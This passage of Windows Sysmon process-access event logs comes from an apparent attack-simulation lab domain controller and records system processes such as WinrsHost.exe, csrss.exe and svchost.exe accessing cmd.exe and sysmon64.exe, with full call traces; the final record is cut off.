{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-001047A10700}\r\nSourceProcessId: 1592\r\nSourceThreadId: 2124\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-001047A10700}","SourceProcessId":"1592","SourceThreadId":"2124","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00102BA40700}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00102BA40700}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 